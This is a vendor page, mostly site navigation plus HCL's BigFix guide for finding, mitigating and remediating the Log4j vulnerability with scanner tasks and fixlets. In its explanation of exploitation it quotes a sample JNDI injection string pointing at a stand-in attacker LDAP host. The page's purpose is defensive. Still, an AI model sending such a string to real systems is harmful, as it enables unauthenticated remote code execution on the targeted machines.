-
Sécurité d'entreprise
Other Featured Products
- HCL BigFix
-
Offerings
-
Workspace+Managing and securing the hybrid workspace with a comprehensive solution that seamlessly manages all devices across any location while focusing on user experience and controlling cyber risk.
-
Enterprise+Intelligent hybrid infrastructure automation offering intelligent runbook automation, leveraging cybersecurity, and analytics capabilities to proactively identify and remediate vulnerabilities in real-time.
-
- Industries
-
Use Cases
-
Solutions
-
Zero Trust Endpoint ManagementAccelerate your Zero Trust pursuit with BigFix Zero Trust Endpoint Management.
-
Remediate Vulnerabilities FastEssential capabilities to remediate vulnerabilities faster than ever, helping organizations reduce cybersecurity risk.
-
Securing the EnterpriseBigFix is an effective solution that protects endpoints before an attack, helps respond to specific cyberattacks.
-
Continuous ComplianceAméliorez la posture de sécurité et automatisez la lutte contre les cyberattaques.
-
Software Asset ManagementMaintain software audit readiness, mitigate non-compliance risk, and optimize software spend.
-
Manage IoT DevicesEfficiently patch, deploy software, inventory, report, and remediate IoT devices from one single platform.
-
Manage MulticloudExtend your capabilities by integrating with other enterprise solutions.
-
Enable Work from HomeEnroll, deploy, secure, and support endpoints in today’s work from home environment.
-
Slash Costs with BigFixSave Money and Reduce Complexities with BigFix.
-
Manage KiosksKiosk security, management, and compliance.
-
An Optimization Model for IT OperationsA roadmap to a greater efficiency, better security, and lower costs.
-
- Events
- Ressources
- Partners
-
Attachments
-
Log4j -vulnerabilities
-
Higher Ed Logo Page
-
All FeaturesThe BigFix product family guide provides an overview of the extensive capabilities...
-
offerings
-
Work From Home
-
BigFix Events & Webinars
-
Past events & webinars
-
BigFix Trust Center
-
BigFix LifecycleReduce cost, risk, and complexity of endpoint and server management.
-
Professional Services
-
BigFix Product FamilyThe BigFix product family guide provides an overview of the extensive capabilities...
-
BigFix Work from HomeEnroll, deploy, secure and support endpoints in today’s work-from-home environment.
-
ESG-BigFix-IVR
-
Tool Consolidation
-
Simplify Endpoint Management through Tool ConsolidationSignificantly reduce IT costs while also reducing IT complexity, streamlining operations, and esuring business continuity.
-
Download ESG Report
-
Compliance Solution Guide
-
IVR Home
-
BigFix Partners
-
BigFix Experts
-
BigFix ComplianceContinuously monitor and enforce endpoint...
-
BigFix InventoryIdentify licensed and unlicensed software across your organization.
-
BigFix MobileExtends modern endpoint management techniques to mobile devices running iOS, iPadOS and Android
-
Continuous ComplianceEnhance security posture and automate the fight against cyberattacks.
-
InventoryMaintain software audit readiness, mitigate security and non-compliance risks, and better understand software usage.
-
qualys
-
Tenable
-
BigFix Days
-
BigFix Days Americas
-
BigFix Days APAC
-
BigFix Days EMEA
-
BigFix Days Japan
-
BigFix InsightsAccelerate risk identification and decision-making.
-
patchReduce cost, risk, and complexity of endpoint and server management.
-
Patch PlusReduce cost, risk, and complexity of endpoint and server management.
-
RemediateReduce cost, risk, and complexity of endpoint and server management.
-
Kiosk Management
-
Service Now
-
Service Now Data Flow
-
Service Graph
-
Intel EMA
-
Qradar
-
Forescout
-
Resilient
-
VMWare ESXi
-
Google Cloud
-
AWS
-
Azure
-
Aruba Clear Pass
-
Rapid 7
-
Demo
-
BigFix Contact Us
-
Customer Video
-
Customer Reference
-
BigFix TrainingA digital workplace with everything employees need.
-
BigFix for SCCM
-
BigFix Summer Launch
-
BigFix Field guide
-
BigFix Upgrade from Patch
-
Log4j Guide
-
Getting Started with BigFix
-
Nutanix
-
BigFix IoT
HCL BigFix Guide
for Countering the Log4J Vulnerability
Nearly every global enterprise or organization is facing pressure to fix what experts are calling one of the most serious software vulnerabilities in recent memory. It’s ubiquitous and easy to exploit.
The flaw in the Log4j software could allow hackers unfettered access to computer systems and has prompted an urgent warning by the U.S. government’s cybersecurity agency.
Attacks have already taken place less than a day after its reporting. Currently, this vulnerability holds a risk matrix base score of 10 and has been labelled by GitHub advisory as a critical severity level.
What is it?
It is a vulnerability discovered in Apache Log4j, the popular Java library developed and maintained by the Apache foundation. The Log4j library is widely used in many commercial and open-source software products as a Java logging routine. The criticality of the vulnerability has a score of 10/10 in the MITRE.org common vulnerability scoring system (CVSS) indicating the severity.
How is it exploited?
The Log4j can be exploited remotely by an unauthenticated adversary using remote code execution (RCE). If an attacker sends a message that contains a string like ${jndi:ldap://dirtyLDAP.com/X}), an external code class or message lookup may result in the execution of malicious code WITHOUT authentication.
Who is impacted?
Hundreds of millions of devices are at risk including those in government, commercial and home computers. In addition, each affected device may have dozens or hundreds of places where the vulnerable code resides, as logging is an extremely common action in all of computing.
How can BigFix help?
The HCL BigFix team is working alongside our customers, security experts, and IT Operations to produce BigFix content to help you identify and fix the Log4j vulnerabilities in your environment.
BigFix is the essential tool for IT Operations. BigFix automates discovery, management, and remediation of all endpoints whether on-premises, mobile, virtual, or in the cloud – regardless of the operating system, location, or connectivity. With BigFix Insights for Vulnerability Remediation, which integrates with leading vulnerability management solutions like Tenable, vulnerabilities like Log4j can be remediated faster than any other solution in the market.
With BigFix you can discovery, mitigate, remediate vulnerabilities, create pre- and post- remediation reports, and protect remediated endpoints.
DISCOVERY
HCL BigFix has developed tasks to help BigFix users discover Log4J instances and vulnerabilities. We used the Logpresso Log4j scanner because it is an open-source Java-based scanner available on GitHub, developed by the Logpresso technical team, and is freely available to the cybersecurity community.
These tasks download a temporary Java runtime to execute the scan, and do not require Java to be installed on the system. These tasks work on Windows 8.1 and higher (x86 and x64), Mac OS X, Linux (x86, x64, armv71, ppc64, ppc64LE, and s390x), AIX 7.1 TL4 and higher, and Solaris (x86 and SPARC). With a manual download of the JRE, the tasks can also execute on HP-UX.
The following four steps articulates the general process for discovering and reporting on the vulnerability:
1. From the "BES Inventory and License" Content Site, execute Task 602 "Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – SCAN only".
2. From the "BES Inventory and License" Content Site, activate Analysis 601 "log4j2-scan results".
3. After scan results have been uploaded to the BigFix Server, view detailed scan results in the Analysis. See the image below.
4. For Executive Reporting, use the "Log4j Vulnerability Report (Logpresso Scan)" view provided in BigFix Web Reports.
MITIGATE
Prior to patches being made available from the application vendors, there are two ways to mitigate the Log4J risk:
1. Use the Logpresso Log4j-scan utility to remove vulnerable Java classes from the affected Log4j-core JAR files. The BigFix task to do this is available from the "BES Inventory and License" Content Site. It is called Task 603 (Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – WITH REMEDIATION).
The Logpresso Log4j-scan utility can perform some remediations on affected Log4j-Core JAR libraries, for both Log4j 2.x and Log4j 1.x. The utility mitigates the worst of the CVEs but may not mitigate all denial-of-service based vulnerabilities. Nonetheless, the utility this can be a very effective step at providing protection while maintaining backward-compatibility with existing applications. For details of the specific mitigations that can be performed by the tool, visit https://github.com/logpresso/CVE-2021-44228-Scanner.
2. Stop or disable the affected applications or services.
REMEDIATE
As vendors make patches available, BigFix will quickly create, test and deliver BigFix fixlets. Download the latest list of BigFix fixlets that remediate Log4J vulnerabilities from https://www.hcltechsw.com/bigfix/log4j-ivr.
REPORT
With BigFix, reports of the affected systems and libraries can be viewed and archived using BigFix Web Reports that show vulnerability and mitigation status across different points in time.
PROTECT
Once the vulnerability has been remediated, BigFix can ensure it doesn’t reappear. With BigFix, you can schedule recurring scans using the available Detection Task so any new systems or software with the Log4J vulnerability can be identified and remediated.
If you need more assistance, search the BigFix forum, contact BigFix Professional Services or contact Technical Support.
Try BigFix Today!
One endpoint management platform enabling IT Operations and Security teams to automate discovery, management and remediation – whether its on-premise, virtual, or cloud – regardless of operating system, location or connectivity.